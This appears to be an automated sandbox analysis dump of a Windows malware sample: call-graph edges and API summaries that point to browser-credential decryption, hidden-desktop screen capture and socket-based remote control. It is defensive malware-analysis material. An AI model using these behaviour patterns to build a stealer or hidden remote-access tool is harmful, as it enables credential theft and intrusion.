b54426 90790->90792 90791->90688 90793 abb0e0 GetLastError 90792->90793 90795 b54434 90793->90795 90794 b583d7 std::_Throw_Cpp_error 90797 aa7cf0 GetLastError 90794->90797 91081 af8b00 6 API calls 90795->91081 90799 b58436 90797->90799 90801 ab7ef0 GetLastError 90799->90801 90800 bd2d60 GetLastError 90800->90816 90803 b584b4 90801->90803 90802 be7500 GetLastError GetLastError 90802->90816 90804 abaf80 GetLastError 90803->90804 90808 b5857c 90804->90808 90805->90778 90807->90683 90809 b5859a SHGetFolderPathA 90808->90809 90812 b585d4 std::_Throw_Cpp_error 90809->90812 90810 b875c0 17 API calls 90810->90966 90811 b86cf0 16 API calls 90811->90966 90813 b65f80 GetLastError 90812->90813 90825 b58959 90812->90825 90814 b5862c 90813->90814 90817 b5864e 90814->90817 90841 b58665 std::_Throw_Cpp_error 90814->90841 90815 b66420 26 API calls 90815->90816 90816->90672 90816->90688 90816->90718 90816->90719 90816->90728 90816->90729 90816->90732 90816->90749 90816->90756 90816->90759 90816->90763 90816->90764 90816->90782 90816->90788 90816->90800 90816->90802 90816->90807 90816->90815 90818 ac6db0 GetLastError 90816->90818 91055 af8b00 6 API calls 90816->91055 91056 bead50 90816->91056 91071 bd2de0 GetLastError 90816->91071 91072 b66a80 90816->91072 91079 beae80 GetLastError GetLastError 90816->91079 90819 ab85d0 8 API calls 90817->90819 90818->90816 90821 b58660 90819->90821 90820 b58944 90822 ab85d0 8 API calls 90820->90822 90824 ab85d0 8 API calls 90821->90824 90822->90825 90823 abb430 7 API calls 90823->90966 90830 b5de84 90824->90830 90826 b86cf0 16 API calls 90825->90826 90829 b58ad9 90826->90829 90827 b65f80 GetLastError 90827->90841 90828 b5df16 std::_Throw_Cpp_error 90832 aa7cf0 GetLastError 90828->90832 90833 b86cf0 16 API calls 90829->90833 90834 b58c4c 90829->90834 90830->90359 90831 abaf80 GetLastError 90831->90966 90840 b5df72 std::_Throw_Cpp_error 90832->90840 90833->90834 90836 b875c0 17 API calls 90834->90836 90835 ab85d0 8 API calls 90835->90841 90839 b58dca 
90836->90839 90837 abb0e0 GetLastError 90837->90966 90842 abb430 7 API calls 90839->90842 90970 b5917b std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error std::_Facet_Register 90839->90970 90845 aa7cf0 GetLastError 90840->90845 90841->90820 90841->90827 90841->90828 90841->90835 90844 b58e4f 90842->90844 90843 aa7cf0 GetLastError 90843->90794 90846 abaf80 GetLastError 90844->90846 90851 b5dfc9 std::_Throw_Cpp_error 90845->90851 90847 b58eee 90846->90847 90848 abaf80 GetLastError 90847->90848 90847->90970 90849 b58f8f 90848->90849 90850 abaf80 GetLastError 90849->90850 90852 b59025 90850->90852 90854 aa7cf0 GetLastError 90851->90854 90853 abaf80 GetLastError 90852->90853 90852->90970 90855 b590c6 90853->90855 90862 b5e01d std::_Throw_Cpp_error 90854->90862 90856 abaf80 GetLastError 90855->90856 90858 b5915c 90856->90858 90857 b86cf0 16 API calls 90857->90970 90859 abb0e0 GetLastError 90858->90859 90860 b5916a 90859->90860 91084 af8b00 6 API calls 90860->91084 90863 aa7cf0 GetLastError 90862->90863 90865 b5e07d std::_Throw_Cpp_error 90863->90865 90864 b76710 14 API calls 90864->90966 90867 aa7cf0 GetLastError 90865->90867 90866 b875c0 17 API calls 90866->90970 90871 b5e0d2 std::_Throw_Cpp_error 90867->90871 90868 b76570 11 API calls 90868->90966 90869 beb540 GetLastError GetLastError 90869->90966 90872 aa7cf0 GetLastError 90871->90872 90875 b5e127 std::_Throw_Cpp_error 90872->90875 90873 abb430 7 API calls 90873->90970 90874 ab7ef0 GetLastError 90874->90966 90876 aa7cf0 GetLastError 90875->90876 90880 b5e182 std::_Throw_Cpp_error 90876->90880 90877 abaf80 GetLastError 90877->90970 90878 abb0e0 GetLastError 90878->90970 90882 aa7cf0 GetLastError 90880->90882 90881 b5ded2 std::_Throw_Cpp_error 90883 aa7cf0 GetLastError 90881->90883 90884 b5e1d7 std::_Throw_Cpp_error 90882->90884 90883->90828 90885 aa7cf0 GetLastError 90884->90885 90886 b5e22c std::_Throw_Cpp_error 90885->90886 90888 aa7cf0 GetLastError 90886->90888 90887 b76710 14 API calls 90887->90970 90890 b5e281 
std::_Throw_Cpp_error 90888->90890 90889 beb540 GetLastError GetLastError 90889->90970 90894 aa7cf0 GetLastError 90890->90894 90891 b76570 11 API calls 90891->90970 90892 beae80 GetLastError GetLastError 90892->90970 90893 ab7ef0 GetLastError 90893->90970 90895 b5e2d6 std::_Throw_Cpp_error 90894->90895 90896 aa7cf0 GetLastError 90895->90896 90897 b5e32b 90896->90897 90898 ab7ef0 GetLastError 90897->90898 90899 b5e39a 90898->90899 90900 abaf80 GetLastError 90899->90900 90902 b5e506 90900->90902 90901 bead50 GetLastError GetLastError 90901->90970 90903 b5e524 SHGetFolderPathA 90902->90903 90905 b5e55e std::_Throw_Cpp_error 90903->90905 90904 ac6db0 GetLastError 90904->90966 90906 b65f80 GetLastError 90905->90906 90990 b5e8c0 std::ios_base::_Ios_base_dtor std::_Facet_Register 90905->90990 90907 b5e5b6 90906->90907 90908 b5e5d8 90907->90908 90926 b5e5ef std::_Throw_Cpp_error 90907->90926 90909 ab85d0 8 API calls 90908->90909 90910 b5e5ea 90909->90910 90915 ab85d0 8 API calls 90910->90915 90911 b5e8ab 90913 ab85d0 8 API calls 90911->90913 90912 bead50 GetLastError GetLastError 90912->90966 90913->90990 90918 b5fe8c 90915->90918 90916 b65f80 GetLastError 90916->90926 90917 ac6db0 GetLastError 90917->90970 90918->90359 90919 ab85d0 8 API calls 90919->90926 90920 aa7cf0 GetLastError 90927 b5ff4c std::_Throw_Cpp_error 90920->90927 90921 ab80a0 GetLastError 90921->90990 90923 b5ff08 std::_Throw_Cpp_error 90924 aa7cf0 GetLastError 90923->90924 90924->90927 90925 bd2d60 GetLastError 90925->90970 90926->90911 90926->90916 90926->90919 90958 b5fd8b std::_Throw_Cpp_error 90926->90958 90930 aa7cf0 GetLastError 90927->90930 90928 b66a80 2 API calls 90928->90970 90929 be7500 GetLastError GetLastError 90929->90970 90931 b60001 90930->90931 90933 ab7ef0 GetLastError 90931->90933 90934 b6007a 90933->90934 90935 b66420 26 API calls 90935->90970 90938 b76710 14 API calls 90938->90990 90939 be7500 GetLastError GetLastError 90939->90966 90942 ab7ef0 GetLastError 90942->90990 90943 b66a80 2 
API calls 90943->90966 90944 b76570 11 API calls 90944->90990 90948 ac6db0 GetLastError 90948->90990 90950 bead50 GetLastError GetLastError 90950->90990 90958->90920 90959 ab80a0 GetLastError 90959->90966 90964 b581ff std::_Throw_Cpp_error 90964->90843 90965 ab80a0 GetLastError 90965->90970 90966->90774 90966->90794 90966->90810 90966->90811 90966->90823 90966->90831 90966->90837 90966->90864 90966->90868 90966->90869 90966->90874 90966->90904 90966->90912 90966->90939 90966->90943 90966->90959 90966->90964 91006 ae12f6 90966->91006 91012 beb9b0 90966->91012 91023 bd2d60 90966->91023 91034 b66420 90966->91034 91082 af8b00 6 API calls 90966->91082 91083 beae80 GetLastError GetLastError 90966->91083 90970->90821 90970->90828 90970->90840 90970->90851 90970->90857 90970->90862 90970->90865 90970->90866 90970->90871 90970->90873 90970->90875 90970->90877 90970->90878 90970->90880 90970->90881 90970->90884 90970->90886 90970->90887 90970->90889 90970->90890 90970->90891 90970->90892 90970->90893 90970->90895 90970->90901 90970->90917 90970->90925 90970->90928 90970->90929 90970->90935 90970->90965 91085 af8b00 6 API calls 90970->91085 91086 bd2de0 GetLastError 90970->91086 90990->90910 90990->90921 90990->90923 90990->90927 90990->90938 90990->90942 90990->90944 90990->90948 90990->90950 90990->90958 90992 beb540 GetLastError GetLastError 90990->90992 91087 beae80 GetLastError GetLastError 90990->91087 90992->90990 91004 b65ff2 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 91002->91004 91003 b663cd GetLastError 91003->91004 91005 b663dc 91003->91005 91004->91003 91004->91005 91005->90651 91007 ae130a __fread_nolock 91006->91007 91089 addefa 91007->91089 91009 ae1324 91010 ad899c __fread_nolock 6 API calls 91009->91010 91011 ae1333 91010->91011 91011->90966 91013 beb9bb 91012->91013 91014 beba14 91012->91014 91016 beb9cd 91013->91016 91020 beb9f2 91013->91020 91118 bd2de0 GetLastError 91014->91118 91117 bd2de0 GetLastError 91016->91117 91017 be7500 2 API calls 
91017->91014 91018 beb9ee 91021 be7500 2 API calls 91018->91021 91022 beba4a 91018->91022 91020->91014 91020->91017 91021->91022 91022->90966 91024 bd2d6d 91023->91024 91033 bd2da7 91023->91033 91025 bd2d8b 91024->91025 91024->91033 91119 bd8150 GetLastError 91024->91119 91027 bd2da9 91025->91027 91028 bd2d91 91025->91028 91122 bd8050 GetLastError 91027->91122 91029 bd2da0 91028->91029 91120 be7690 GetLastError 91028->91120 91121 bd8100 GetLastError 91029->91121 91033->90966 91035 b664e4 91034->91035 91036 b66a80 2 API calls 91035->91036 91048 b665ba std::ios_base::_Ios_base_dtor 91035->91048 91037 b6665a 91036->91037 91038 b66681 91037->91038 91039 b66729 91037->91039 91123 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91038->91123 91152 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91039->91152 91042 b667c5 91153 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91042->91153 91043 b666aa 91124 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91043->91124 91046 b666be 91125 b66d00 91046->91125 91048->90966 91050 abb159 91049->91050 91051 abb18a std::_Throw_Cpp_error 91049->91051 91050->90704 91052 aa7cf0 GetLastError 91051->91052 91053 abb1c2 91052->91053 91054->90816 91055->90816 91057 bead5b 91056->91057 91058 bead6d 91056->91058 91057->91058 91060 be7500 2 API calls 91057->91060 91059 beade1 91058->91059 91065 bead8d 91058->91065 91177 bd8150 GetLastError 91058->91177 91062 beadff 91059->91062 91063 beade7 91059->91063 91060->91058 91180 bd8050 GetLastError 91062->91180 91066 beadf6 91063->91066 91178 be7690 GetLastError 91063->91178 91069 be7500 2 API calls 91065->91069 91070 beae3f 91065->91070 91179 bd8100 GetLastError 91066->91179 91069->91070 91070->90816 91071->90816 91074 b66ab7 91072->91074 91073 b66ac2 CryptUnprotectData 91073->91074 91075 b66ae8 std::ios_base::_Ios_base_dtor std::locale::_Locimp::_Locimp 91073->91075 91074->91073 91074->91075 91076 ae1c96 ___std_exception_destroy GetLastError 91075->91076 91077 b66b0c std::_Throw_Cpp_error 
91075->91077 91078 b66bfc 91076->91078 91077->90816 91078->90816 91079->90816 91080->90778 91081->90966 91082->90966 91083->90966 91084->90970 91085->90970 91086->90970 91087->90990 91105 adce79 91089->91105 91091 addf55 91092 addf7a 91091->91092 91111 ade1d0 6 API calls __fread_nolock 91091->91111 91112 adce94 6 API calls 2 library calls 91092->91112 91093 addf0d 91093->91091 91094 addf22 91093->91094 91104 addf3d 91093->91104 91110 ad8be3 5 API calls __fread_nolock 91094->91110 91099 addfb8 91103 ade043 __aulldiv 91099->91103 91114 adce22 6 API calls __fread_nolock 91099->91114 91100 addf8f 91100->91099 91113 adce94 6 API calls 2 library calls 91100->91113 91115 adce22 6 API calls __fread_nolock 91103->91115 91104->91009 91106 adce7e 91105->91106 91107 adce91 91105->91107 91116 ad8c60 6 API calls __fread_nolock 91106->91116 91107->91093 91109 adce8e 91109->91093 91110->91104 91111->91092 91112->91100 91113->91100 91114->91103 91115->91104 91116->91109 91117->91018 91118->91018 91119->91025 91120->91029 91121->91033 91122->91033 91123->91043 91124->91046 91130 b66f84 91125->91130 91135 b66d62 91125->91135 91126 ad2b99 GetSystemTimePreciseAsFileTime 91127 b66d6c 91126->91127 91128 b66d77 91127->91128 91129 b66fcf 91127->91129 91131 b66fd6 91128->91131 91137 b66d87 91128->91137 91132 ad2534 std::_Throw_Cpp_error 8 API calls 91129->91132 91130->91135 91176 ad38de 6 API calls 91130->91176 91133 ad2534 std::_Throw_Cpp_error 8 API calls 91131->91133 91132->91131 91136 b66fe7 std::_Throw_Cpp_error 91133->91136 91135->91126 91154 b87440 91136->91154 91139 aa9280 2 API calls 91137->91139 91143 b66e69 91139->91143 91140 b66f35 std::_Throw_Cpp_error 91142 ad2baa GetSystemTimePreciseAsFileTime 91140->91142 91141 b66e92 GetPEB 91141->91143 91144 b66f53 91142->91144 91143->91140 91143->91141 91144->91048 91145 b67058 91168 aa9280 91145->91168 91147 b67299 91172 aa8f20 91147->91172 91149 b672e9 91152->91042 91153->91048 91155 b87490 91154->91155 91156 ad9820 6 API calls 
[Call-graph edge listing omitted: the extraction rendered this part of the graph as node identifiers and edges only. APIs named on nodes in this span: recv, Sleep, GetProcAddress, WSASend, GetSystemTimePreciseAsFileTime, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetLastError, SetLastError, LoadLibraryA, GetModuleHandleA, GetVersion, GetVersionExA, SetThreadExecutionState, ConvertStringSecurityDescriptorToSecurityDescriptorA, GetCurrentThreadId, GetCurrentProcessId, GetThreadDesktop, OpenDesktopA, CreateDesktopA, SHGetFolderPathA, CreateDirectoryA.]
                                                                          APIs
                                                                          • __aulldiv.LIBCMT ref: 06B84E33
                                                                          • send.WS2_32(?,?,?,00000000), ref: 06B85003
                                                                          • __aulldiv.LIBCMT ref: 06B84954
                                                                            • Part of subcall function 06B74630: __aulldiv.LIBCMT ref: 06B746B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __aulldiv$send
                                                                          • String ID: ^^$%>#6$&V\$),'$,'$Button$Cqu=$Cqu=$Cqu=$C~xx$C~xx$Ea=y$GVwe$GVwe$H%f0$HjDBKYOik35wJkl$I{uo$J`sv$J`sv$TluK$TluK$Tzxx$Tzxx$U3?2$U3?2$g}n
                                                                          • API String ID: 3864168910-3234738182
                                                                          • Opcode ID: 33eada6bba48bfd7b18e6493156ce8f33946ea47424347ec481c46f1f7baf22b
                                                                          • Instruction ID: 2d611f70caedf65ee19e6af107e4e04f6955a479296650a5cdd50b4c23e743e1
                                                                          • Opcode Fuzzy Hash: 33eada6bba48bfd7b18e6493156ce8f33946ea47424347ec481c46f1f7baf22b
                                                                          • Instruction Fuzzy Hash: 6054EFB4D092A88BDB65CF28C894AE9BBB1AF49304F1481EAD44DA7351EB305FC5CF51
                                                                          APIs
                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B4A1F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID: a"@$ {q$ {q$ {q$ {q$ {q$ {q$ {q$ {q$ {q$##r$%<t$)!D$+|rR$/pb($/}H)$2c~($<r{/$>0u$>0u$?a{v$E}xS$MJRh$Ml$Ml$Ml$Ml$Ml$Ml$Ml$QO1j$Z@*j$\X7j$cannot use operator[] with a string argument with $cannot use push_back() with $e]L$f3{;$oA]$oA]$Dn
                                                                          • API String ID: 1514166925-1358879020
                                                                          • Opcode ID: a9c4beae145e12a3c2f09d7b34daa5e10aa95df85638089ec8ad9fe43c027f9f
                                                                          • Instruction ID: fbb6e8181c9187b7ff7a520b6eaa5fdbb35bc091d964a7d791002a2aa3255953
                                                                          • Opcode Fuzzy Hash: a9c4beae145e12a3c2f09d7b34daa5e10aa95df85638089ec8ad9fe43c027f9f
                                                                          • Instruction Fuzzy Hash: C9B423B4D052688BDB25DF68C980BEDBBB5BF49304F1082DAD849A7242DB716F84CF51

                                                                          Control-flow Graph

                                                                          [Graph for the function at 06B9C230 (blocks 06B9C230 to 06B9C986) omitted: the extraction rendered it as a node/edge listing with executed/not-executed colouring. The API calls made from its basic blocks are listed under APIs below.]
                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(80000041), ref: 06B9C253
                                                                          • SetThreadExecutionState.KERNEL32(80000001), ref: 06B9C262
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00021980,00000000,00000000,00000000), ref: 06B9C277
                                                                          • CloseHandle.KERNEL32(00000000), ref: 06B9C28A
                                                                          • GetDesktopWindow.USER32 ref: 06B9C290
                                                                          • GetWindowRect.USER32(?,?), ref: 06B9C2AA
                                                                          • GetSystemMetrics.USER32(00000000), ref: 06B9C2CA
                                                                          • GetSystemMetrics.USER32(00000001), ref: 06B9C2DB
                                                                          • GetDC.USER32(00000000), ref: 06B9C301
                                                                          • CreateCompatibleDC.GDI32(580107E9), ref: 06B9C339
                                                                          • CreateCompatibleBitmap.GDI32(580107E9,00000000,00000000), ref: 06B9C35B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 06B9C376
                                                                          • shutdown.WS2_32(?,00000002), ref: 06B9C484
                                                                          • closesocket.WS2_32 ref: 06B9C49F
                                                                          • SetThreadDesktop.USER32(0000010C), ref: 06B9C505
                                                                          • Sleep.KERNEL32(00000064), ref: 06B9C518
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9C527
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9C52E
                                                                          • SetThreadDesktop.USER32(00000A84), ref: 06B9C543
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9C549
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9C550
                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000500,00000400,580107E9,00000000,00000000,00CC0020), ref: 06B9C5B0
                                                                          • DeleteObject.GDI32(00000000), ref: 06B9C600
                                                                          • DeleteDC.GDI32(00000000), ref: 06B9C60A
                                                                          • ReleaseDC.USER32(00000000,580107E9), ref: 06B9C622
                                                                          • Sleep.KERNEL32(000003E8), ref: 06B9C6C1
                                                                          • GetSystemMetrics.USER32(00000000), ref: 06B9C6E3
                                                                          • GetSystemMetrics.USER32(00000001), ref: 06B9C6F1
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9C70C
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9C713
                                                                          • SwitchDesktop.USER32(0000010C), ref: 06B9C83E
                                                                          • SetThreadDesktop.USER32(00000A84), ref: 06B9C84B
                                                                          • Sleep.KERNEL32(?), ref: 06B9C8DB
                                                                          • Sleep.KERNEL32(00000BB8), ref: 06B9C926
                                                                          • DeleteObject.GDI32(00000000), ref: 06B9C935
                                                                          • DeleteDC.GDI32(00000000), ref: 06B9C93F
                                                                          • ReleaseDC.USER32(00000000,580107E9), ref: 06B9C958
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$Desktop$DeleteMetricsSleepSystem$CreateCurrentObject$CompatibleExecutionReleaseStateWindow$BitmapCloseHandleRectSelectSwitchclosesocketshutdown
                                                                          • String ID: HjDBKYOik35wJkl$P
                                                                          • API String ID: 1429317180-3505193903
                                                                          • Opcode ID: cc7ebab838998ccf0bbe7eb480c68a811d11dee94939a35d35fc740b56b99e4f
                                                                          • Instruction ID: 25b5753996df07da00a1df021eaaf9f96792d69b551b6ec29c69361b2ced876a
                                                                          • Opcode Fuzzy Hash: cc7ebab838998ccf0bbe7eb480c68a811d11dee94939a35d35fc740b56b99e4f
                                                                          • Instruction Fuzzy Hash: 62224AF4D01258DFDB54DFA8D894BADBBB6FB88300F1081A9E609AB381D7759944CF60

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(80000041), ref: 06B9C9BB
                                                                          • SetThreadExecutionState.KERNEL32(80000001), ref: 06B9C9CA
                                                                            • Part of subcall function 06B7D3F0: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(06B9CA21,00000001,06BEA924,00000000), ref: 06B7D41D
                                                                          • GetVersion.KERNEL32 ref: 06B9C9E3
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9CA24
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9CA2B
                                                                          • LoadLibraryA.KERNEL32(?,?,0000000F), ref: 06B9CB9A
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06B9CD93
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06B9CF7E
                                                                          • LoadLibraryA.KERNEL32(?), ref: 06B9D09B
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06B9D367
                                                                          • LoadLibraryA.KERNEL32(?), ref: 06B9D4B0
                                                                          • GdiplusStartup.GDIPLUS(?,00000001,00000000), ref: 06B9D4F7
                                                                          • CreateThread.KERNEL32(00000000,00000000,06B9C230,00000000,00000000,00000000), ref: 06B9D50C
                                                                          • CloseHandle.KERNEL32(00000000), ref: 06B9D528
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$AddressLibraryLoadProc$DescriptorExecutionSecurityState$CloseConvertCreateCurrentDesktopGdiplusHandleStartupStringVersion
                                                                          • String ID: C}Sr$D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$HjDBKYOik35wJkl$Id`o$J'tq$RlTt$S:(ML;;NW;;;LW)$hLD3
                                                                          • API String ID: 4097687401-865544600
                                                                          • Opcode ID: 70ec02a44e1781fe8f002a881dfba76d7f744d2d7a93246b2da0a255c8f92975
                                                                          • Instruction ID: 0991a7bf23a270a4e1f417ffd0297dee45de5cf618a2e51060f2b59a50898c79
                                                                          • Opcode Fuzzy Hash: 70ec02a44e1781fe8f002a881dfba76d7f744d2d7a93246b2da0a255c8f92975
                                                                          • Instruction Fuzzy Hash: 8F720DB4D092A88BDB66CF6898817EDBBB1AF59304F1081D9D98CB7211EB305BC5CF51
                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(80000041), ref: 06B919C0
                                                                          • SetThreadExecutionState.KERNEL32(80000001), ref: 06B919CF
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B919E2
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B919E9
                                                                          • SetThreadDesktop.USER32(00000A84), ref: 06B919FE
                                                                          • recv.WS2_32(00000AD4,00000000,00000004,00000002), ref: 06B91A58
                                                                          • WSAGetLastError.WS2_32 ref: 06B91A61
                                                                          • __aulldiv.LIBCMT ref: 06B928DF
                                                                            • Part of subcall function 06B74630: __aulldiv.LIBCMT ref: 06B746B2
                                                                          • __aulldiv.LIBCMT ref: 06B92DA8
                                                                          • send.WS2_32(?,?,?,00000000), ref: 06B92F53
                                                                          • recv.WS2_32(?,?,0000000C,00000002), ref: 06B93148
                                                                          • recv.WS2_32(?,?,0000000C,00000008), ref: 06B9320A
                                                                          • recv.WS2_32(?,?,00000000,00000008), ref: 06B933C6
                                                                          • Sleep.KERNEL32(0000000A), ref: 06B94093
                                                                          • Sleep.KERNEL32(00000001), ref: 06B9409B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$recv$__aulldiv$DesktopExecutionSleepState$CurrentErrorLastsend
                                                                          • String ID:
                                                                          • API String ID: 4270644286-0
                                                                          • Opcode ID: 1acb88b45bceda5d850d1819a83e208a40298595f0d07448a95e2ea66ba38db5
                                                                          • Instruction ID: 20a3ea74fa2c4e45876e33ec15069ab4fe05d696b35c5c7adcc0f3d8892658ab
                                                                          • Opcode Fuzzy Hash: 1acb88b45bceda5d850d1819a83e208a40298595f0d07448a95e2ea66ba38db5
                                                                          • Instruction Fuzzy Hash: C443CFB4D056688FDBA4CF18C894BEEBBB2AB89300F1481EAD54DA7351D7319E85CF50
                                                                          APIs
                                                                            • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00B2272B
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000005,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00B22A27
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B22D25
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B23085
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B233B3
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000008,00000000,00000000,?), ref: 00B236B7
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00B24461
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FolderPath$Concurrency::cancel_current_taskErrorLast
                                                                          • String ID: #!r$cannot compare iterators of different containers$cannot get value$type must be boolean, but is $type must be string, but is
                                                                          • API String ID: 1377278223-1634894188
                                                                          • Opcode ID: 982dc2736014b0bf6cc37087394dc8d321c5e23e6d67cc4969d5342bd97ed1bf
                                                                          • Instruction ID: 35876c851a166fdedb0c056215287eee79dd6a25e63fc506247b60599350d4cc
                                                                          • Opcode Fuzzy Hash: 982dc2736014b0bf6cc37087394dc8d321c5e23e6d67cc4969d5342bd97ed1bf
                                                                          • Instruction Fuzzy Hash: 4B430FB4C052688BDB25DF28D994BEDBBB5BF49304F1082DAE44DA7241EB316B84CF51
                                                                          APIs
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 00B3F1A4
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00B41BF6
                                                                            • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 00B41EDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateDirectory$ErrorFolderLastPath
                                                                          • String ID: %asv$,:u$Ml$cannot use operator[] with a string argument with $cannot use push_back() with $h$w
                                                                          • API String ID: 3244528402-2251990608
